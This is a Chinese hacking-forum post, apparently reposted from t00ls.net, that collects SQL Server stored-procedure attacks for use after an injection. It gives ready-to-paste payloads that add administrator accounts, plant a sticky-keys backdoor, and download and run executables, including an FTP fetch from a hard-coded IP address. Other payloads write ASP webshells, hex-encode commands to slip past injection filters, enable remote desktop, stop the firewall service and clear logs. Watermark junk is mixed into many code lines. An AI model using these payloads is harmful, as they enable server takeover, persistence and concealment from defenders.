• 注册
  • 技术交流 技术交流 关注:7 内容:19

    SQL高级注入使用之储存过程

  • 查看作者
  • 打赏作者
    • 技术交流
    • 在xp_cmdshell被删除或者出错情况下,可以充分利用SP_OACreate进行提权

       
      首先
       
      EXEC sp_configure 'show advanced options', 1;  
      RECONFIGURE WITH OVERRIDE;  
      EXEC sp_configure 'Ole Automation Procedures', 1;  
      RECONFIGURE WITH OVERRIDE;  
      EXEC sp_configure 'show advanced options', 0;
       
      打开组件,2005中默认关闭
       
      1)直接加用户
       
      2000系统:
       
      declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 123 123 /add'
      declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 123/add'
       
        
       
      xp和2003系统:
       
      declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 123$ 123/add'
      declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 123$ /add'
       
        
       
      2)粘贴键替换
       
      declare @o int
      exec sp_oacreate 'scripting.filesystemobject', @o out
      exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
       
      declare @o int
      exec sp_oacreate 'scripting.filesystemobject', @o out
      exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
       
      需要同时具备sp_oacreate 和sp_oamethod 两个功能组件
       
      3)直接传马
       
      DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, '%systemroot%\system32\cmd.exe /c echo open 222.180.210.113 > cmd.txt&echo 123>> cmd.txt&echo123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&1.exe&1.exe&del cmd.txt. /q /f&del 1.exe /f /q'--
       
      4)启动项写入加账户脚本
       
      declare @sp_passwordxieo int, @f int, @t int, @ret int
      exec sp_oacreate 'scripting.filesystemobject', @sp_passwordxieo out
      exec sp_oamethod @sp_passwordxieo, 'createtextfile', @f out, 'd:\RECYCLER\1.vbs', 1
      exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("WSCRIPT.NETWORK")'
      exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.ComputerName'
      exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
      exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")'
      exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create("user","123$")'
      exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "123"'
      exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo'
      exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/123$",user)'
      exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/123$"';
       
      5)如果该服务器有网站,则直接用方法4)写入一句话

      收藏很久了 不过看到很多朋友没有就放出来啦~~~
      出来新的方法 欢迎大家补充。。。www.t00ls.net4 [2 G8 W+ g1 g4 _; `8 Z, R7 C0 @4 p5 e
      www.t00ls.net- q1 l* T* g& _8 z7 w9 i+ y/ P
      sql2005恢复xp_cmdshell
      EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; - 低调求发展 - 老牌第三方民间网络安全交流平台; j3 R. A7 i9 a) _' Y
      关闭:EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;T00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security* h6 a' \( \' R. h5 Q% b
      零、T00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security# L9 R! Y* T5 W% G5 A
      ---------------& v9 z- T& b" O1 x
      -- 添加SA用户--
      ---------------T00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security) s- p! S+ q/ T- R. v  t, y* K
      &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
      1、exec master.dbo.sp_addlogin system;T00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security, B/ d, ^, D8 t4 c
      2、exec master.dbo.sp_addlogin system,system;www.t00ls.net  Q/ x) N" D& N4 j7 `
      3、exec master.dbo.sp_addsrvrolemember itpro,sysadmin
      | 低调求发展 - 潜心习安全5 r+ P0 J- `9 K% W4 N
      &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
      防注入 sa:itpro pass:itpro
      declare @s varchar(4000) set @s=cast(0x65786563206d61737465722e64626f2e73705f6164646c6f67696e20697470726f as varchar(4000));exec(@s); declare @c varchar(4000) set @c=cast(0x65786563206d61737465722e64626f2e73705f70617373776f7264206e756c6c2c697470726f2c697470726f as varchar(4000));exec(@c); declare @a varchar(4000) set @a=cast(0x65786563206d61737465722e64626f2e73705f616464737276726f6c656d656d6265722027697470726f272c2073797361646d696e as varchar(4000));exec(@a);-- and 1=1( R: k8 I0 W0 P. F

      防注入 sa:system pass:system
      declare @s varchar(4000) set @s=cast(0x65786563206d61737465722e64626f2e73705f6164646c6f67696e2073797374656d2c73797374656d as varchar(4000));exec(@s);declare @a varchar(4000) set @a=cast(0x65786563206d61737465722e64626f2e73705f616464737276726f6c656d656d626572202773797374656d272c2073797361646d696e as varchar(4000));exec(@a);-- and 1=1T00LS/ f/ ^% X9 n8 L; s
      一、
      --------------www.t00ls.net$ @3 K% F# D6 N4 U- B/ i" _
      -恢复存储过程-
      --------------T00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security& n0 r" Z/ g0 D, U
      &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&T00LS2 ?/ y: e9 W' m4 t
      use master | 低调求发展 - 潜心习安全& C8 L- j+ H& `% E5 @
      exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'www.t00ls.net" @8 p& A3 F5 n+ y) z
      exec sp_dropextendedproc "xp_cmdshell"
      exec sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
      exec sp_dropextendedproc 'xp_cmdshell'
      exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
      exec sp_addextendedproc xp_dirtree,'xpstar.dll'
      exec sp_addextendedproc xp_enumgroups,'xplog70.dll'+ b+ d- \& X$ {; `* h- L
      exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' - 低调求发展 - 老牌第三方民间网络安全交流平台- A+ D; B! ]8 h. p
      exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
      exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'T00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security$ d* F1 O$ E, P. U  a( u& {2 _
      exec sp_addextendedproc xp_getfiledetails,'xpstar.dll' - 低调求发展 - 老牌第三方民间网络安全交流平台5 k, i% F& S) J1 |
      exec sp_addextendedproc sp_OACreate,'odsole70.dll'
      exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
      exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'www.t00ls.net  ^8 b. v1 ~1 ]2 B6 R* d
      exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'T00LS4 n  s. K$ @( F2 ~
      exec sp_addextendedproc sp_OAMethod,'odsole70.dll' | 低调求发展 - 潜心习安全. k& d! e# ]4 E7 D! y  Y( [( s
      exec sp_addextendedproc sp_OASetProperty,'odsole70.dll' - 低调求发展 - 老牌第三方民间网络安全交流平台8 g. w7 c* V5 P9 i  @: U8 b
      exec sp_addextendedproc sp_OAStop,'odsole70.dll' - 低调求发展 - 老牌第三方民间网络安全交流平台3 w. @* @  T2 p! l( u  b7 j
      exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
      exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
      exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
      exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
      exec sp_addextendedproc xp_regread,'xpstar.dll'
      exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
      exec sp_addextendedproc xp_regwrite,'xpstar.dll'
      exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
      &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
      恢复cmdshell防注入
      ============================================================T00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security: g& G  J% Z- t  w
      declare @a varchar(255),@b varchar(255),@c varchar(255);
      set @a=0x6D61737465722E2E73705F616464657874656E64656470726F63;
      set @b=0x78705F636D647368656C6C;
      set @c=0x78706C6F6737302E646C6C;T00LS) W  B( i. K$ C% ^/ `4 c/ w
      exec @a @b,@cwww.t00ls.net/ e! D( I: A% g; Y: v; c. ]
      ============================================================" _/ d8 [+ w8 v+ ~
      T00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security2 @# Y' _6 G1 o9 C
      二、T00LS' j! I1 R4 n' S+ r: A9 ~

      ----------------------------------
      --恢复sp_addextendedproc存储过程--
      ----------------------------------T00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security/ F' t! ^+ M. f6 p6 E: L  F" A. Y
      &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
      create procedure sp_addextendedproc --- 1996/08/30 20:13
      @functname nvarchar(517),/* (owner.)name of function to call */ @dllname varchar(255)/* name of DLL containing function */ as
      set implicit_transactions off - 低调求发展 - 老牌第三方民间网络安全交流平台: U  O* _) }' d4 S! h
      if @@trancount > 0T00LS: P' v; ~  n" c8 X$ T
      beginT00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security! _- f  l& E) e/ g# j
      raiserror(15002,-1,-1,'sp_addextendedproc')
      return (1) | 低调求发展 - 潜心习安全4 \' e/ K4 y. y* n, S" u# ]$ A
      endwww.t00ls.net: G  Y+ K2 @- ]
      dbcc addextendedproc( @functname, @dllname)www.t00ls.net8 S! x, u+ c5 \
      return (0) -- sp_addextendedproc | 低调求发展 - 潜心习安全; e* r) C0 q  V7 L0 K
      GO
      &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& | 低调求发展 - 潜心习安全$ @6 ~) f8 @/ d* p  ~( `& I

      三、T00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security5 O* q1 Z8 E) m+ f; w
      --------------------------  f! {0 N/ l) S8 M9 |; a# f
      --使用存储过程加管理方法--
      --------------------------
      &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&1 w, k, M' ~$ f' m/ r$ _
      1、master.dbo.xp_cmdshell 'net user itpro gmasfm && net localgroup administrators itpro /add'
      2、EXEC sp_resolve_logins 'text', 'e:\asp\"&net user admina admin /add&net localgroup administrators admina /add&dir "e:\asp', '1.asp'
      3、DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD
      @shell,'run',null, 'C:\WINdows\system32\cmd.exe /c net user sadfish fish /add'www.t00ls.net8 v, N) `0 @6 B9 z, \! @
      &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&T00LS9 t- K- Q/ J: p' B

      四、
      -------------------------
      -- 导出文件的存储过程  --
      -------------------------www.t00ls.net: L9 h1 ~- K/ a$ T9 R0 G
      &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&T00LS0 ~' ]- O* J. a
      DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINdows\system32\cmd.exe /c netstat -an >c:\1.txt'www.t00ls.net1 Q' G( R! K( r# K5 E2 ]
      &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&T00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security+ j: B/ C+ z# }# m

      五、www.t00ls.net4 l) ^( |: J( `6 W- U9 s& O3 J, v0 k8 B
      ---------------------------
      --  读取文件的存储过程   --T00LS5 \. B) H$ p6 @9 G" v& X9 e
      ---------------------------) f/ B; h. ?7 j9 Y
      &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&www.t00ls.net9 U0 a- |# c/ D: S2 q, e. `
      declare @o int, @f int, @t int, @ret int
      declare @line varchar(8000)
      exec sp_oacreate 'scripting.filesystemobject', @o outT00LS' o. G6 c! A7 O
      exec sp_oamethod @o, 'opentextfile', @f out, 'c:\1.txt', 1www.t00ls.net9 \, t$ \  B# w3 W% q  S  w
      exec @ret = sp_oamethod @f, 'readline', @line out
      while( @ret = 0 )
      beginT00LS1 U! m4 e, @) z% i- v
      print @line
      exec @ret = sp_oamethod @f, 'readline', @line out
      endT00LS4 p) q' C+ P  p- p* " `! _
      &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&T00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security3 T3 N  |+ ~( `/ Y$ W% G+ q

      六、 | 低调求发展 - 潜心习安全8 R2 F* n+ f# `

      ----------------------
      -----写一句话木马-----
      ----------------------
      &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& - 低调求发展 - 老牌第三方民间网络安全交流平台' @- \# Y7 ~& w% N+ h/ p
      declare @o int, @f int, @t int, @ret int | 低调求发展 - 潜心习安全4 K9 T/ N/ w+ X, Z1 e9 ~
      exec sp_oacreate 'scripting.filesystemobject', @o out
      exec sp_oamethod @o, 'createtextfile', @f out, 'c:\Inetpub\tianhong\2.asp', 1www.t00ls.net# K0 y) F5 m% _1 a3 Y  W
      exec @ret = sp_oamethod @f, 'writeline', NULL,$ j( @( I: j  i5 f# L- M1 y
      '<%execute(request("a"))%>'     ' ' 单引号为要写的内容
      <%25 if request("x")<>"" then execute(request("x"))%25>
      &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&T00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security) o+ Z) u& v* c7 Z7 E

      防注入写入法www.t00ls.net  n( }9 D9 ?) V; ?4 m& B
      ================================================================
      declare @a int,@b int,@c varchar(255),@d varchar(255),@e varchar(255),@f varchar(255),@g varchar(255),@h varchar(255),@i varchar(255),@j varchar(255);
      set @c=0x6D61737465722E2E73705F6F61637265617465;www.t00ls.net6 e: l! F8 \6 \; `
      set @d=0x6D61737465722E2E73705F6F616D6574686F64;
      set @e=0x536372697074696E672E46696C6573797374656D4F626A656374; | 低调求发展 - 潜心习安全0 a* y7 [& w0 x7 S6 Q
      set @f=0x4372656174655465787446696C65;
      set @g=0x433A5C496E65747075625C73797374656D2E617370;T00LS; H* v* G% h; T0 L5 p8 k
      set @h=0x74727565;
      set @i=0x7772697465;" Q+ {2 D6 e" m0 T& ~, W
      set @j=0x3C256576616C20726571756573742822582229253E;T00LS- y+ q: N: F! q3 p$ M1 O, c
      exec @c @e,@a output; | 低调求发展 - 潜心习安全' e! G9 T2 I& `* A! K
      exec @d @a,@f,@b output,@g,@h;" B* M) y% L! n" z
      exec @d @b,@i,null,@j
      ==================================================================T00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security: g& ~6 n: C6 D* r0 K0 ~
      T00LS  Q2 G+ L. n: o2 {7 ~
      七、www.t00ls.net+ ~1 D# }# ?3 J
      ----------------------T00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security1 I" H8 B' P/ K/ ]! e# K8 [; q3 s: N2 a
      -----写一句话木马----- | 低调求发展 - 潜心习安全3 u" G( V8 c% Y# _
      ----------------------www.t00ls.net( m# L4 G6 p9 [. _, o
      xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
      declare @s nvarchar(4000);select @s=0x730065006c00650063007400200027003c00250045007800650063007500740065002800720065007100750065007300740028002200610022002900290025003e000d000a002700;exec sp_makewebtask 0x43003a005c007a00770065006c006c002e00610073007000, @s;-- and% 1=1
      在上面一样;exec%20sp_makewebtask%20'd:\zjkdj\zjkdj\zjkds\bake.asp,'%20select%20''<%25execute(request("a"))%25>''%20';--
      xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx) d2 u' Z) D2 u" l

      八、
      ---------------------- - 低调求发展 - 老牌第三方民间网络安全交流平台+ b; h  w) y: t. {
      ---SA沙盒模式提权-----
      ---------------------- - 低调求发展 - 老牌第三方民间网络安全交流平台* v, B" U, n( }- q& A9 P# s
      &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& | 低调求发展 - 潜心习安全: f) S: @5 P% ~7 H& }& Y
      1、exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--www.t00ls.net+ C1 \& ~8 D" m, M! T1 y- ^
      - 低调求发展 - 老牌第三方民间网络安全交流平台" \( d! R: F) U& j
      2、Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user itpro gmasfm /add")');" b( _" A& ^$ M4 K: X3 q( n
      &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
      T00LS* b# j2 o( L5 S/ J
      九、
      -------------------- | 低调求发展 - 潜心习安全0 R+ _5 J0 j& k. }$ F
      -----另类SA提权-----T00LS9 K" H( j/ E( r/ I7 O3 l' c" n
      -------------------- - 低调求发展 - 老牌第三方民间网络安全交流平台, [( t2 Z/ d0 c" r8 k
      xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxT00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security5 g9 k- W- O3 m0 v
      2、declare @oo int
      exec sp_oacreate 'scripting.filesystemobject', @oo out
      exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';, w6 ^7 U' q. A  t# u
      1、declare @o intT00LS$ f& |' I2 j- H' A3 c
      exec sp_oacreate 'scripting.filesystemobject', @o out - 低调求发展 - 老牌第三方民间网络安全交流平台" N7 c1 G3 F/ B5 n! r( [& W" y
      exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';

      DECLARE @o intT00LS1 Y, q& E- t% ^; m4 t8 b
      DECLARE @z int
      EXEC sp_OACreate 'Shell.Users',@o OUTwww.t00ls.net3 J' |2 r0 P* a! Z
      EXEC sp_OAMethod @o, 'Create', @z OUT, 'test'
      EXEC sp_OASetProperty  @z, 'setting', 3 , 'AccountType'T00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security* n: P) \5 Q4 P( h; A6 c
      EXEC sp_OAMethod @z, 'ChangePassword',NULL , '123456', ''% e- Q- L( Y8 |3 R9 d/ Z0 q6 {
      xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

      十、T00LS! q0 h4 X! p) v! f" _. m
      --------------
      --导出注册表--
      --------------! g% U; i( \1 ~2 J. h( D
      xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
      1、drop table [regdir];create table [regdir](value nvarchar(1000) null,data nvarchar(1000) null)--www.t00ls.net$ |4 D+ B  a/ j3 ~4 R3 r
      $ L* K/ S, `( O2 B
      2、delete [regdir];insert [regdir]exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port'

      xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

      十一、
      3 _/ Y% E0 m5 }1 S
      ----------------T00LS4 ^- _4 ]+ J0 S4 c. r) S# ]0 s. a
      ---下载程序-----T00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security/ x; v$ g& m3 n: _
      ---------------- - 低调求发展 - 老牌第三方民间网络安全交流平台# T" `" R8 M' a
      xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
      1、declare @b varbinary(8000),@hr int,@http int,@down int exec sp_oacreate [microsoft.xmlhttp],@http output exec @hr = sp_oamethod @http,[open],null,[get],[ 链接],0 exec @hr = sp_oamethod @http,[send],null exec @hr=sp_oagetproperty @http,[responsebody],@b output exec @hr=sp_oacreate [adodb.stream],@down output exec @hr=sp_oasetproperty @down,[type],1 exec @hr=sp_oasetproperty @down,[mode],3 exec @hr=sp_oamethod @down,[open],null exec @hr=sp_oamethod @down,[write],null,@b exec @hr=sp_oamethod @down,[savetofile],null,[c:/a.exe],1 ;-- and 1=1* {/ I( Q8 K! F2 m1 T+ L  N. d

      xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxT00LS4 ~; s* C) S. ^- `6 w( X

      十二、
      www.t00ls.net6 l  I, U# e# d1 j) [$ L
      -----------------
      -Log备份WebShell-
      -----------------
      xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
      alter database master set RECOVERY FULL
      create table cmd (a image)--www.t00ls.net) {. s8 F% B; q9 Q9 @/ Z: N/ v
      backup log master to disk = 'c:\cmd' with init
      insert into cmd (a) values ('<%eval(request("a")):response.end%>')--
      backup log master to disk = 'C:\Inetpub\wwwroot\ri3.asp'--www.t00ls.net8 D3 N0 K8 R9 u, C, Q" q/ F2 d
      drop table cmd--
      2\

      use mirT00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security" v4 B( k/ T5 R" O  @
      alter database mir set RECOVERY FULL --
      create table cmd8 (a image)--2 R5 l  Y! \8 b- b# l! U
      backup log mir to disk = 'c:\cmd8' with init --+ s/ f1 \1 u, E( t, I
      insert into cmd8 (a) values ('<%eval(request("a")):response.end%>')--
      backup log mir to disk = 'c:\backup.asp'--www.t00ls.net$ Z: g0 R8 r3 p6 h' n+ `& G
      drop table cmd8-- | 低调求发展 - 潜心习安全0 k! i5 e8 P1 b7 {
      alter database mir set RECOVERY SIMPLE --
      3\
      create/**/table/**/[dbo].[shit_tmp]/**/([cmd]/**/[image])-- - 低调求发展 - 老牌第三方民间网络安全交流平台& I% c& V# g1 ^
      declare/**/@a/**/sysname,@s/**/nvarchar(4000)/**/select/**/@a=db_name(),@s=0x6C0061006F007A0068006F007500/**/backup/**/log/**/@a/**/to/**/disk/**/=/**/@s/**/with/**/init,no_truncate--
      insert/**/into/**/[shit_tmp](cmd)/**/values(0x3C256576616C28726571756573742822612229293A726573706F6E73652E656E64253E)-- | 低调求发展 - 潜心习安全( c& w8 A8 M% u, U( y6 R5 ~+ D4 U
      select/**/@s=0x63003a005c0031002e00610073007000/**/backup/**/log/**/@a/**/to/**/disk=@s/**/with/**/init,no_truncate--
      Drop/**/table/**/[shit_tmp]--T00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security) h- q2 ?  i/ g8 s
      xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

      十三、 | 低调求发展 - 潜心习安全3 K* a8 y  m9 a! w
      -------------------------------
      --创建sp_readtextfile存储过程-- - 低调求发展 - 老牌第三方民间网络安全交流平台- L- l0 J6 A3 k4 I8 D
      -------------------------------
      xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
      Create proc sp_readTextFile @filename sysname
      asT00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security  c1 W9 v. E! y& J' o  x2 \3 p
      T00LS0 ~: ], V' Q+ `' t  b3 F+ H
        begin
        set nocount on
        Create table #tempfile (line varchar(8000))
        exec ('bulk insert #tempfile from "' + @filename + '"')
        select * from #tempfile - 低调求发展 - 老牌第三方民间网络安全交流平台  z# r- m  a# _
        drop table #tempfilewww.t00ls.net$ [* T0 z' E7 A! _# ^
      EndT00LS3 ^3 o* y6 f! X% K9 X
      goT00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security& H' f; N8 K: q, K6 o: P& C: [

      xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
      # j7 M8 {7 n4 {
      十四、开3389; E$ q$ r! W! d7 s5 N1 ~/ {- h' R
      ===================================================================
      declare @a varchar(255),@b varchar(255); set @a=0x6D61737465722E64626F2E78705F636D647368656C6C; set @b=0x636D64202F6320776D6963205244544F47474C45205748455245205365727665724E616D653D2725434F4D50555445524E414D4525272063616C6C20536574416C6C6F775453436F6E6E656374696F6E732031; exec @a @bT00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security0 t5 D0 x7 i4 \9 W+ O  z
      ===================================================================www.t00ls.net% g8 s4 N+ z' C9 }9 A% B# A
      www.t00ls.net3 M8 n" q6 c% ~* m

      | 低调求发展 - 潜心习安全2 V. Y  e; N$ s0 a9 G$ n; X
      | 低调求发展 - 潜心习安全5 M' H( U: v! P' o
      我记得2003的web目录是写在C:\WINDOWS\system32\inetsrv\MetaBase.xml% o/ x8 a8 _. M) t+ g
      ----------------- - 低调求发展 - 老牌第三方民间网络安全交流平台! D* _) Z. u( k! O3 _9 b) \6 G0 g& U
      ---读取文件内容--www.t00ls.net: ^7 k3 j9 @. W. r
      -----------------T00LS& M7 c! f2 w  W* J- x3 e0 k
      exec sp_readTextFile 'c:\boot.ini'

      - 低调求发展 - 老牌第三方民间网络安全交流平台0 M3 @( ?2 }( ~: S
      xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File  Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\cmd.exe' - 低调求发展 - 老牌第三方民间网络安全交流平台# ^# m+ U% U  a- v' H% S6 k$ M$ i
      : y3 _/ [' a2 k, K( P6 G

      -----------------------
      ---清除MsSql日志-------
      -----------------------
      xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxT00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security2 M$ B$ f1 a1 b0 b8 u4 `8 _
      set nocount on
      declare @logicalfilename sysname,
      @maxminutes int,
      @newsize int$ m5 u7 r$ p- }$ {0 I8 y
      xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
      | 低调求发展 - 潜心习安全* |  Z* ~% I  s! l, o- p
      ----------------------T00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security# s0 I/ i/ d, l1 |1 w& _( o
      --停掉或激活某个服务--T00LS' h# W" R! W( F  W3 d
      ----------------------
      exec master..xp_servicecontrol 'stop','sharedaccess' | 低调求发展 - 潜心习安全5 Q8 F# `5 O4 s3 |9 Z+ ]& {$ [: L
      exec master..xp_servicecontrol 'start','sharedaccess'
      T00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security; V$ ^! ^- {0 f3 f1 G" n  X
      --------------------
      --列出驱动器的名称--
      --------------------
      ( B6 ^3 M7 ^7 N0 `5 R
      EXEC [master].[dbo].[xp_availablemedia]T00LS: b5 ~7 ^: V1 Y. m: P* V  i

      ----------------------------------7 H% m* x: N) w8 W' \( @
      --列出指定目录的所有下一级子目录--
      ----------------------------------9 S- E# V* n, I4 I: [  f, ]
      % d" R" E, N( q7 n
      EXEC [master].[dbo].[xp_subdirs] 'c:\windows'

      ------------------------------
      --列出当前错误日志的具体内容--
      ------------------------------
      T00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security; J: K; `* F8 Y& t8 O+ _
      EXEC [master].[dbo].[xp_readerrorlog] - 低调求发展 - 老牌第三方民间网络安全交流平台4 S5 @1 g, q! o3 @6 Z+ A8 \  \

      ----------------------
      --列出当前计算机名称-- | 低调求发展 - 潜心习安全. p/ M. `+ {6 J6 }3 H! d; b
      ----------------------
      - 低调求发展 - 老牌第三方民间网络安全交流平台* M5 U/ `5 b$ E; g+ T$ [! g
      execute master..xp_getnetname

      -------------------------------- | 低调求发展 - 潜心习安全/ D& p( ^4 f+ p/ w7 X8 s
      -列出当前计算机的驱动器可用空间-
      --------------------------------8 B, G& A7 e# ~- ^) Z2 }. B
        X$ |$ G' }- T+ @" I( z6 }# I- k
      execute master..xp_fixeddrives
      - 低调求发展 - 老牌第三方民间网络安全交流平台0 n. J7 o& Z+ N. V
      ======================== | 低调求发展 - 潜心习安全+ }, _! H0 N9 C' |' A1 s8 M
